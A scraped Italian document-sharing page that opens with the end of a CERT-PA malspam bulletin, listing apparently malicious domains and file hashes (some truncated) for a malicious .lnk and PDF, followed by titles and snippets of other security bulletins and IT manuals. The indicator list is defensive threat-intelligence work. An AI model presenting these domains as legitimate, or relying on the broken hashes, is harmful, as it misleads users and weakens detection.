18 easthamorg.com webshops-linux.com phunctions.com condosforrentinorlando.com workerscompemployersolutions.com berkeleytaylorconsultants.com petperksandstuff.com techlobby.com invicta-osrs.com thecannabismarketer.com myvahine.com moresaleswithai.com nvshenye.com nycloot.com consciousrevolutionist.com thetomatokitchen.com mtgrush.com firstchoicebarhire.com sharkfuckers.com larvooper.me nrefg.eu kofeservis.com jhkfhbfr.eu awrvip.eu implantrefer.com ta-meyer.com IP File Documenti per clienti.lnk o MD5: f024ab87c23a763a7f375135d46e9020 o SHA1: 82b6570dc0c6e984b1d75a84f0f9dceb22eb350c o SHA256: 04832f7affb4520d8314afb5a2488c d187f5b24d7379baf0cbd6a467f Documenti per Clienti.pdf o MD5: 36b1879b729816ca1a20babb550a1f37 o SHA1: 6eb259b2c7bf b305b0c13b116229bb0 o SHA256: b51eae12fb aff13a54ef7f48ccfc754567ba3ef19e289554e87d926f9 CERT-PA-B
ID: CERT-PA-B Data: 21/02/2018
Campagne di Malspam verso obiettivi Italiani ID: CERT-PA-B001-180221 Data: 21/02/2018 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari
ID: CERT-PA-B Data: 20/03/2019
Bollettino: Campagna di malspam Gootkit indirizzata verso PEC italiane ID: CERT-PA-B001-190320 Data: 20/03/2019 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro
ID: CERT-PA-B Data: 09/12/2015
Bollettino: Nuova variante Cryptolocker ID: Data: 09/12/2015 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati
ID: CERT-PA-B Data: 10/03/2016
Bollettino: Nuova variante Cryptolocker ID: Data: 10/03/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati
ID: CERT-PA-B Data: 17/12/2015
Bollettino: Nuova variante Malware RAT ID: Data: 17/12/2015 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal
ID: CERT-PA-B Data: 27/07/2018
Campagna ursnif italiana ID: CERT-PA-B005-180727 Data: 27/07/2018 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati
ID: CERT-PA-B Data: 29/07/2016
Bollettino: Nuovi IoC Ransomware Locky ID: CERT-PA-B023-160729 Data: 29/07/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di
ID: CERT-PA-B Data: 26/10/2017
Bollettino: Campagna Ransomware BadRabbit ID: Data: 26/10/2017 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati
ID: CERT-PA-B Data: 18/04/2019
Bollettino: Campagna di malspam Ursnif indirizzata verso PEC italiane ID: CERT-PA-B002-190418 Data: 18/04/2019 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro
ID: CERT-PA-B Data: 07/05/2018
Furto di Hash NTLM tramite PDF ID: CERT-PA-B004-180507 Data: 07/05/2018 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia
Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif -
Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif - ID: CERT-PA-B006-180808 Data: 08/08/2018 AVVERTENZE Il documento ha lo
ID: CERT-PA-B Data: 07/04/2016
Bollettino: Petya Ransomware ID: Data: 07/04/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA,
ID: CERT-PA-B Data: 05/01/2016
Bollettino: Ransom32 JS ID: Data: 05/01/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA, al
ID: CERT-PA-B Data: 20/10/2017
Bollettino: RAT Orcus ID: CERT-PA-B016-171020 Data: 20/10/2017 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati
ID: CERT-PA-B Data: 29/12/2017
Bollettino: Statistiche vulnerabilità 2017 con dettaglio sui principali software ID: Data: 29/12/2017 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento
ID: CERT-PA-B Data: 30/12/2015
Bollettino: Statistiche vulnerabilità 2015 ID: Data: 30/12/2015 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati
Configurazione della postazione di lavoro per il corretto funzionamento della crittografia
Configurazione della postazione di lavoro per il corretto funzionamento della crittografia Sommario Requisiti Minimi Crittografia Italgas... 2 Verifica dei Certificati... 2 Installazione... 2 Verifica
Corso di Laboratorio di Sistemi Operativi
Corso di Laboratorio di Sistemi Operativi Lezione 4 Alessandro Dal Palù email: alessandro.dalpalu@unipr.it web: www.unipr.it/~dalpalu Approfondimento su make http://http://capone.mtsu.edu/csdept/facilitiesandresources/make.htm
Internet Information Services
Internet Information Services Installazione Installare Internet Information Services con i componenti necessari per la pubblicazione degli applicativi web della Suite Infinity. Configurazione filtro ISAPI
Istruzioni per l installazione del Local Scheduler
Istruzioni per l installazione del Local Scheduler Questa guida è solo un estratto, per maggiori informazioni consultare il manuale completo dello scheduler. E possibile installare lo schedulatore in 2
Configurazione della postazione di lavoro per il corretto funzionamento della crittografia
Configurazione della postazione di lavoro per il corretto funzionamento della crittografia Sommario Requisiti Minimi Crittografia Snam... 2 Verifica dei Certificati... 2 Installazione... 2 Verifica certificato...
Progetto Gennaio 2017
UNIVESITÁ DEGLI STUDI DI MILANO LAUREA TRIENNALE IN COMUNICAZIONE DIGITALE PROGETTO LABORATORIO DI RETI DI CALCOLATORI Progetto Gennaio 2017 Matteo Zignani 12 dicembre 2016 1 PRESENTAZIONE DEL PROBLEMA
Lezione 5: Controllo del flusso e costrutti avanzati
Lezione 5: Controllo del flusso e costrutti avanzati Laboratorio di Elementi di Architettura e Sistemi Operativi 20 Marzo 2013 Parte 1: Il valore di uscita di un processo Il valore di uscita di un processo
Aggiornamenti del software Guida per l'utente
Aggiornamenti del software Guida per l'utente Copyright 2008 Hewlett-Packard Development Company, L.P. Windows è un marchio registrato negli Stati Uniti di Microsoft Corporation. Le informazioni contenute
MANUALE INSTALLAZIONE PROTOCOLLO DA CD
pag. 1 MANUALE INSTALLAZIONE PROTOCOLLO DA CD pag. 2 1. INTRODUZIONE 3 2. NUOVA INSTALLAZIONE. 4 3. SISTEMI GIÀ OPERANTI CON VERSIONE A 32 BIT. 5 4. SISTEMI OPERANTI CON VERSIONE A 16 BIT. 6 5. ULTERIORI
MAIL ENCRYPTOR PLUG-IN - User guide-
MAIL ENCRYPTOR PLUG-IN - User guide- Aggiornato alla versione 3.2.1.9 MAIL ENCRYPTOR PLUG-IN Sommario Installazione di Mail Encryptor plug-in... 3 Utilizzo di Mail Encryptor plug-in... 5 Cifratura delle
SHAREPOINT CONNECTOR PLUG-IN - short guide-
SHAREPOINT CONNECTOR PLUG-IN - short guide- Aggiornato alla versione Boole Server 3.2.1.9 SHAREPOINT CONNECTOR PLUG-IN Sommario Installazione di Sharepoint Connector plug-in... 3 Utilizzo di Sharepoint
Controllo di flusso negli script: if-then-else
Controllo di flusso negli script: if--else Il coman condizionale if condition_command true_commands else false_commands esegue il coman condition command e utilizza il suo exit status per decidere se eseguire
Laboratorio di Basi di Dati
Laboratorio di Basi di Dati Docente: Alberto Belussi Lezione 10 Architettura Model-View-Controller (MVC) L'architettura MVC può essere applicata anche alla tecnologia PHP secondo diversi approcci. In questa
Le presenti note si riferiscono esclusivamente alla procedura di installazione e di aggiornamento di Planet HR.
Planet HR: note per l aggiornamento e l installazione (Pagina 1:9) Premessa Le presenti note si riferiscono esclusivamente alla procedura di installazione e di aggiornamento di Planet HR. Accedere al sistema
Aggiornamenti del software Guida per l'utente
Aggiornamenti del software Guida per l'utente Copyright 2008 Hewlett-Packard Development Company, L.P. Windows è un marchio registrato negli Stati Uniti di Microsoft Corporation. Le informazioni contenute
Aggiornamenti del software Guida per l utente
Aggiornamenti del software Guida per l utente Copyright 2009 Hewlett-Packard Development Company, L.P. Windows è un marchio registrato negli Stati Uniti di Microsoft Corporation. Le informazioni contenute
Dipartimento di Scienze Chimiche Laboratorio Interdipartimentale di Chimica Computazionale
A tutti gli utenti: il nuovo sistema di gestione dei job tramite code, preparato dall Ing. Sella che ringrazio per il suo lavoro, è entrato in funzione. Si tratta di una modalità di gestione del sistema
Certificati di postazione
Certificati di postazione Sequenza delle operazioni per la generazione e l installazione del certificato di postazione MANUALE OPERATIVO VERSIONE: 1.1 (11/04/2013) Sommario Introduzione... 3 Sequenza delle
Fondamenti di Informatica e Laboratorio T-AB Ingegneria Elettronica e Telecomunicazioni. Lab Shell. Lab-Shell 1
Fondamenti di Informatica e Laboratorio T-AB Ingegneria Elettronica e Telecomunicazioni Lab Shell Lab-Shell 1 Scelta della shell La prima riga di un file comandi deve specificare quale shell si vuole utilizzare:
Caselle di Posta Elettronica
Ufficio Segreteria Caselle di Posta Elettronica Configurazione e abilitazione Note pratiche versione PI 06.02.00 Quando il testo è utile Il testo è utile quando si ha la necessità di configurare una nuova
Come scaricare il software di virtualizzazione e la VM da utilizzare per le esercitazioni di laboratorio descritte nelle videolezioni
Come scaricare il software di virtualizzazione e la VM da utilizzare per le esercitazioni di laboratorio descritte nelle videolezioni Per scaricare la VM bisognerà collegarsi alla pagina web dell insegnamento
Guida pratica all attivazione della componente applet per la firma digitale interna al portale VestaNET
Guida pratica all attivazione della componente applet per la firma digitale interna al portale Aggiornamento al 09/02/2017 È stato introdotto il paragrafo di appendice, realizzato con la preziosa collaborazione
Metodi numerici con elementi di Programmazione A.A
Metodi numerici con elementi di Programmazione A.A. 2013-2014 Introduzione al MatLab VI parte 1 Docente: Vittoria Bruni Email: vittoria.bruni@sbai.uniroma1.it Ufficio: Via A. Scarpa, Pal. B, I piano, Stanza
Accedere ad ASM in modo sicuro via HTTPS
Archive Server for MDaemon Accedere ad ASM in modo sicuro via HTTPS Premessa... 2 Parte 1 - Creare una richiesta di certificate SSL... 3 Creare una richiesta di certificato attraverso l amministrazione
Interfaccia a Linea di Comando di Windows (Prompt dei comandi) Dott. Ing. Giuseppe Serano
Interfaccia a Linea di Comando di Windows (Prompt dei comandi) Dott. Ing. Giuseppe Serano Cos'è l'interfaccia a Linea di Comando di Windows? L'Interfaccia a Linea di Comando di Windows (CLI Command Line
Guida alla configurazione di apparati Zyxel per l uso in abbinamento a piattaforme Wi-Fi Hotel e WiFinity
Guida alla configurazione di apparati Zyxel per l uso in abbinamento a piattaforme Wi-Fi Hotel e WiFinity Rev. Novembre 2016 Per configurare gli apparati a marchio Zyxel e predisporli al funzionamento
Controllo del flusso. Laboratorio di Sistemi Operativi primavera if/else. if/else
Laboratorio di Sistemi Operativi primavera 2009 Controllo del flusso Il controllo del flusso dà al programmatore la possibilità di scegliere che solo una parte del codice venga eseguita o che un altra
Istruzioni per l installazione del Local Scheduler
Istruzioni per l installazione del Local Scheduler E possibile installare lo schedulatore in 2 diverse modalità: versione standalone versione Service (solo per SO Windows) Per eseguire l installazione
ISTRUZIONI PER LO SPOSTAMENTO DEL CytoSIFOII DA UN PC AD UN ALTRO
ISTRUZIONI PER LO SPOSTAMENTO DEL CytoSIFOII DA UN PC AD UN ALTRO Tutte le operazioni devono essere eseguite da un utente che abbia una conoscenza informatica sufficiente e che sia in possesso di un utente
Generazione di certificati X.509 nell ambito dei test di interoperabilità dei Sistemi di Posta Elettronica Certificata (PEC)
Generazione di certificati X.509 nell ambito dei test di interoperabilità dei Sistemi di Posta Elettronica Certificata (PEC) Antonio De Maglio 15 ottobre 2014 1 1 Introduzione Figura 1: funzionamento PEC
Manuale Utente. Servizio Quick Print. Equitalia Servizi SpA. Status: In Vigore. Titolo Documento : Manuale Utente - Servizio Quick Print
Equitalia Servizi SpA Manuale Utente Servizio Quick Print 1 Data: 02/0/2012 Sommario 1. Revisioni del documento... 3 2. Introduzione... 3 3. Installazione del plug-in spazio... 3 Cos è il plug-in... 3
La connessione ai database MySQL tramite script PHP versione 5.5
La connessione ai database MySQL tramite script PHP versione 5.5 Php è un linguaggio di scripting che estende le funzionalità del server Web, mentre MySQL è un programma server che si occupa della gestione
Documentazione e tutorial
P r o g e t to Sinapsi RunAs Documentazione e tutorial Ver.1 del 01/12/2016 P.Iva 02554100129 email: assistenza-sinapsirunas@ghiraldello.it Pagina 1 di 13 Sommario Progetto Sinapsi RunAs Documentazione
Portale fornitori di Coni Servizi S.p.A.
CONI SERVIZI S.P.A. Largo Lauro De Bosis n 15, 00135 Roma Portale fornitori di Coni Servizi S.p.A. Istruzioni operative portale per la formulazione della risposta alla RDO on line Codice Gara_50_RdO_93
SCHEMA ER. Tutti i dati del carrello acquisti sono memorizzati nel database e quindi può essere costruito con più query.
Esame di Stato Istituto Tecnico Industriale CORSO DI ORDINAMENTO Indirizzo: INFORMATICA Proposta di soluzione per il tema di: INFORMATICA GENERALE E APPLICAZIONI TECNICO-SCIENTIFICHE Anno Scolastico: 2007-2008
Aggiornamento database versione Aggiornamento procedure:
Aggiornamento database versione 2.4.0.20 Aggiornamento procedure: - SD.98 (ANPR / Anagrafe ) versione 2.4.0.20 - STC (Stato civile) versione 2.0.19 Teramo, 25 Giugno 2018 INDICE 1 DOWNLOAD DEGLI AGGIORNAMENTI
Come ripristinare la Password Guida Rapida
HIKVISION EUROPE B.V. Come ripristinare la Password Guida Rapida (Come resettare la password con la Nuova Strategia Password ) Nome: Ripristino Password Editore: HIKVISION EUROPE B.V. Tipo: Guida Rapida
L aggiornamento è comprensivo di tutte le segnalazioni di anomalie pervenute dopo il rilascio della versione precedente.
DATI IDENTIFICATIVI DELL AGGIORNAMENTO Applicativo: GIS Redditi : 19.00.1c00 Tipo Aggiornamento Data di rilascio: 22.03.2019 Gentile cliente, La informiamo che è disponibile un aggiornamento GIS REDDITI.
Avviare il sistema operativo Linux Debian su Macchina Virtuale (VM) Guida per VirtualBox & VMware
Avviare il sistema operativo Linux Debian su Macchina Virtuale (VM) Guida per VirtualBox & VMware Istruzioni per VMware - 1 Cliccare su «Create a New Virtual Machine» Selezionare l installazione da immagine
Shell: variabili di sistema. Per visualizzare il valore di tutte le variabili d ambiente si usa il comando set
PATH Shell: variabili di sistema HOME USER PWD SHELL HOSTNAME HOSTTYPE Per visualizzare il valore di tutte le variabili d ambiente si usa il comando set Shell: variabili di sistema Per visualizzare il
Table of Contents Configurazione del client VPN in Microsoft Windows XP...1
Table of Contents Configurazione del client VPN in Microsoft Windows XP...1 Certificati rilasciati dall'infn Certification Authority...1 Certificato personale...1 Importazione del certificato personale
Laboratorio Pianificare Operazioni tramite la GUI e il Comando AT in Windows Vista
5.0 5.5.1.8 Laboratorio Pianificare Operazioni tramite la GUI e il Comando AT in Windows Vista Introduzione Stampare e completare questo laboratorio. In questo laboratorio, verrà pianificata una attività
Sommario. Prefazione... 15. Parte I - Introduzione
Sommario Prefazione... 15 Parte I - Introduzione 1. Installazione e primo avvio... 23 Windows Management Framework...23 Installazione...24 Requisiti minimi per l installazione...24 Installazione del framework
Firma Digitale Procedura Rinnovo
Firma Digitale Procedura Rinnovo Versione: 0.01 Aggiornata al: 16.04.2014 Premessa La procedura di rinnovo dei certificati di firma digitale può essere avviata da 6 mesi prima della scandenza, fino ad
Manuale d uso della piattaforma per lo sviluppo e rilascio di componenti software. QMSS - Continuous Integration
Manuale d uso della piattaforma per lo sviluppo e rilascio di componenti software Verifica massiva - ReadMe 13/12/2017 README 1 di 7 AGGIORNAMENTI Versione Data Paragrafi modificati Motivo modifica 1.0.0
Introduzione alla programmazione nella shell di Unix 10 Maggio 2005
Introduzione alla programmazione nella shell di Unix 10 Maggio 2005 1 Page 1 Shell e programmazione La shell di UNIX definisce un vero e proprio linguaggio di programmazione, le cui caratteristiche principali
Funzionalità per Enti Locali
Funzionalità per Enti Locali Manuale Utente per Enti Locali Versione del 12/02/2018 Sommario Introduzione... 2 Registrazione utente... 2 Accreditamento per Enti Locali... 9 Trasmissione Candidature firmate...
Per visualizzare il valore di tutte le variabili d ambiente si usa il comando env
Tipi di Shell sh Bourne shell csh C shell ksh Korn shell bash Bourne Again (Bash) shell tcsh TENEX C shell zsh Z shell rc rc shell es es shell à csh e bash sono le più comuni. Per cambiare il tipo di shell
Installazione PostgreSQL Rev. 2
Installazione PostgreSQL Rev. 2 Lodi, 13/05/2019 Installazione PostgreSQL per IAF Modalità di installazione e configurazione delle componentistiche SW necessarie al funzionamento degli applicativi basati
Page 1. Programmazione. Shell e programmazione. File comandi (script) Introduzione alla programmazione nella shell di Unix
Introduzione alla programmazione nella shell di Unix 10 Maggio 2005 1 Programmazione E` possibile memorizzare sequenze di comandi all'interno di le eseguibili: Ad esempio: #!bin/bash echo hello world!
ESPORTAZIONE E CARICAMENTO DELLE FATTURE ELETTRONICHE NEL PORTALE DOCUMATIC E-INVOICE
Codice documento 18121804 Data creazione 18/12/2018 Ultima revisione 30/04/2019 Software PODOWORKS Versione 7 ESPORTAZIONE E CARICAMENTO DELLE FATTURE ELETTRONICHE NEL PORTALE DOCUMATIC E-INVOICE Il presente
Come scaricare il software di virtualizzazione e la VM da utilizzare per le esercitazioni di laboratorio descritte nelle videolezioni
Come scaricare il software di virtualizzazione e la VM da utilizzare per le esercitazioni di laboratorio descritte nelle videolezioni Per scaricare la VM bisognerà collegarsi alla pagina web dell insegnamento
Indice. Introduzione. Capitolo 1 Introduzione a Windows Server Edizioni di Windows Server
Indice Introduzione XI Capitolo 1 Introduzione a Windows Server 2003 1.1 Edizioni di Windows Server 2003 1 Capitolo 2 Installazione 15 2.1 Requisiti hardware 15 2.2 Sviluppo di un piano di distribuzione
Esercitazione 3 Gnu Privacy Guard
Sommario Esercitazione 3 Gnu Privacy Guard Laboratorio di Sicurezza 2018/2019 Andrea Nuzzolese Gnu Privacy Guard (GPG) Principali funzionalità Descrizione esercitazione Scopo Interazione con il sistema
Aggiornamento remoto della chiave hardware. Sommario
AMV S.r.l. Via San Lorenzo, 106 34077 Ronchi dei Legionari (Gorizia) Italy Ph. +39 0481.779.903 r.a. Fax +39 0481.777.125 E-mail: segreteria@amv.it www.amv.it Cap. Soc. 10.920,00 i.v. P.Iva: IT00382470318
ID: CERT-PA-B Data: 27/06/2019
Bollettino: Dropper Ursnif con form VBA e limitato al mese di Giugno ID: CERT-PA-B004-270610 Data: 27/06/2019 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di
L'applicazione integrata con il servizio My Fattura
L'applicazione integrata con il servizio My Fattura Come funziona einvoicemanger (eim) 2 Per il CICLO ATTIVO 2 Per il CICLO PASSIVO 2 Come può essere utilizzato 2 Installazione di eim 2 Installazione del
Acquisto di cancelleria sul Portale
Acquisto di cancelleria sul Portale Modifica cronologia Aggiornare la seguente tabella come necessario quando questo documento viene modificato: Data Nome Modifica descrizione Pagina 1 / 47 Situazione
DOCSUITE. Guida all utilizzo del modulo Fatturazione Elettronica
DocSuite Modulo Fatturazione Elettronica, pagina 1 di 18 DOCSUITE Guida all utilizzo del modulo Fatturazione Elettronica DocSuite Modulo Fatturazione Elettronica, pagina 2 di 18 Sommario Cruscotto Fatturazione
Sicurezza delle applicazioni web: protocollo HTTP
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: protocollo HTTP Alessandro Reina, Aristide Fattori 05 Maggio
Lab. di Sistemi Operativi - Lezione in aula - a.a. 2012/2013
Lab. di Sistemi Operativi - Lezione in aula - a.a. 2012/2013 Processi bash 1 Sommario I processi Comando ps (process status) Terminazione di un processo CTRL-C Kill Controllo dei processi Processi in background
Dipartimento Politiche Sociali e della Salute OSSERVATORIO SOCIALE SULLA CONCERTAZIONE TERRITORIALE. Manuale del software Utente Lettore Vers. 5.
Dipartimento Politiche Sociali e della Salute OSSERVATORIO SOCIALE SULLA CONCERTAZIONE TERRITORIALE Manuale del software Utente Lettore Vers. 5.0 Novembre 2016 Indice Tre passaggi per entrare nel programma...
Laboratorio - Pianificare Operazioni tramite la GUI e il Comando AT in Windows 7
5.0 5.5.1.7 Laboratorio - Pianificare Operazioni tramite la GUI e il Comando AT in Windows 7 Introduzione Stampare e completare questo laboratorio. In questo laboratorio, verrà pianificata una attività
Manuale d uso della Posta TBS. Oracle Collaboration Suite
Manuale d uso della Posta TBS. Oracle Collaboration Suite Indice 1 Introduzione...3 2 Prerequisiti:...3 3 Accesso WEB...3 3.1 Come cambiare la propria password...8 4 Quota spazio su disco del mail server...9
Gli indirizzi PEC distribuiti in Ateneo sono del tipo:
SERVIZIO DI POSTA ELETTRONICA CERTIFICATA GUIDA PER I DOCENTI L Università degli Studi di Napoli Parthenope ha attivato esclusivamente per tutto il personale docente in organico il servizio di Posta Elettronica
Introduzione all ambiente MATLAB. Richiami II. Analisi Numerica - A.A. 2007/08
Introduzione all ambiente MATLAB Richiami II Programmazione MATLAB MATLAB non è un vero e proprio linguaggio di programmazione, ma permette comunque di realizzare programmi utilizzando le classiche strutture
Shell: variabili di sistema PATH HOME USER PWD SHELL HOSTNAME. Per visualizzare il valore di tutte le variabili d ambiente si usa il comando set
Shell: variabili di sistema PATH HOME USER PWD SHELL HOSTNAME Per visualizzare il valore di tutte le variabili d ambiente si usa il comando set Shell: variabili di sistema Per visualizzare il valore di
Parte II: Reti di calcolatori Lezione 7 (31)
Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2017-18 Pietro Frasca Parte II: Reti di calcolatori Lezione 7 (31) Martedì 27-03-2018 1 Messaggio di
Basi di dati Applicazioni web in PHP per l interrogazione di basi di dati Laboratorio #5
Basi di dati Applicazioni web in PHP per l interrogazione di basi di dati Laboratorio #5 Politecnico di Torino 21 maggio 2019 Introduzione Questa esercitazione ha come obiettivo quello di realizzare una
Elaborato Shell. Elementi di architettura e sistemi operativi 2016/2017
Elaborato Shell Elementi di architettura e sistemi operativi 2016/2017 Introduzione passwd è il file di configurazione di sistema in cui sono memorizzate alcune delle informazioni relative agli account
Guida utente alla compilazione delle richieste di contributo on-line per le Associazioni dei Consumatori
Guida Utente RCP3 Agenzia nazionale per l attrazione degli investimenti e lo sviluppo d impresa SpA Guida utente alla compilazione delle richieste di contributo on-line per le Associazioni dei Consumatori
Modulo FILCONAD. 1. Campi dell'anagrafica clienti (scheda anagrafica della GDO): MIGG Informatica & Ricerca - 1
Modulo FILCONAD Questa guida serve a configurare il programma alla gestione del modulo FILCONAD. Il modulo FILCONAD permette l'esportazione dei documenti con il tracciato FILCONAD. Le aziende che lavorano
SERVIZIO ONLINE «CREARE SEGNI DI AFFRANCATURA» ISTRUZIONI PER LA FUNZIONE «CREARE AFFRANCATURA PP»
SERVIZIO ONLINE «CREARE SEGNI DI AFFRANCATURA» ISTRUZIONI PER LA FUNZIONE «CREARE AFFRANCATURA PP» Edizione Gennaio 2019 1 Sommario 1 Introduzione 4 1.1 Scopo del documento 4 1.2 Scopo del servizio online
Esercitazione 1 Crittografia Simmetrica
Sommario Esercitazione 1 Crittografia Simmetrica Laboratorio di Sicurezza 2018/2019 Andrea Nuzzolese Crittografia simmetrica Cifrare messaggi con chiave segreta Decifrare messaggi con chiave segreta Argomenti
Manuale Operativo per il Processo di Qualifica dei Fornitori
Manuale Operativo per il Processo di Qualifica dei Fornitori SBI S.r.l. 20024 Garbagnate M.se 16128 Genova Cap.Soc. 250.000 i.v. Viale Forlanini, 38 Salita Salvatore Viale 1/7 P.IVA 04513160962 Tel. +39
Introduzione all ambiente MATLAB. Richiami II. Calcolo Numerico - A.A. 2008/09
Introduzione all ambiente MATLAB Richiami II Programmazione MATLAB MATLAB non è un vero e proprio linguaggio di programmazione, ma permette comunque di realizzare programmi utilizzando le classiche strutture
Installazione. MS SQL Server Rev. 2
Installazione MS SQL Server 2016 Rev. 2 Lodi, 21/03/2018 1 Modalità di installazione e configurazione SQLServer2016 - Express Attenzione: MS SQL Server (qualsiasi versione) va installato nella stessa lingua
A.A. 2018/2019. Fondamenti di Programmazione in MATLAB FONDAMENTI DI INFORMATICA E PROGRAMMAZIONE. Docente Prof. Raffaele Pizzolante
A.A. 2018/2019 Fondamenti di Programmazione in MATLAB Strutturazione del Codice Sorgente Docente Prof. Raffaele Pizzolante FONDAMENTI DI INFORMATICA E PROGRAMMAZIONE Fondamenti di Programmazione in MATLAB:
Gruppo Buffetti S.p.A. Largo dei Caduti di El Alamein, Roma
Sommario VERSIONI CONTENUTE NEL PRESENTE AGGIORNAMENTO... 2 AVVERTENZE!!!... 3 INVIO TELEMATICO USC E IRAP/2016... 3 Gestore File Telematici... 6 SERVIZIO AGGIORNAMENTO DATI ALIQUOTE IMU - TASI AL 13/06/2016...
IL LIVELLO APPLICAZIONI WEB e HTTP
Parte II - Reti di Calcolatori ed Internet IL LIVELLO APPLICAZIONI WEB e HTTP 7-1 Applicazioni di Rete World Wide Web URL Web Client Web Server HTTP Futuro del Web 7-2 World Wide Web (WWW) Il World Wide
1. Schema concettuale della base di dati PROGETTO CONCETTUALE SCHEMA ER
Esame di Stato Istituto Tecnico Industriale Proposta di soluzione della seconda prova Indirizzi: Informatica - CORSO DI ORDINAMENTO e Progetto ABACUS Anno Scolastico: 2004-2005 1. Schema concettuale della
IL LIVELLO APPLICAZIONI WEB e HTTP
Parte II - Reti di Calcolatori ed Internet IL LIVELLO APPLICAZIONI WEB e HTTP Applicazioni di Rete World Wide Web URL Web Client Web Server HTTP Futuro del Web 7-1 7-2 World Wide Web (WWW) Il World Wide
ISTRUZIONI PER LA FORMULAZIONE DELL OFFERTA
Procedure Aperte ISTRUZIONI PER LA FORMULAZIONE DELL OFFERTA 1 Sommario 1 OBIETTIVI DEL DOCUMENTO... 3 2 CREAZIONE OFFERTA... 4 2.1 LOG ON... 4 2.2 PAGINA INIZIALE... 5 2.3 CREAZIONE OFFERTA... 8 2.4 INSERIMENTO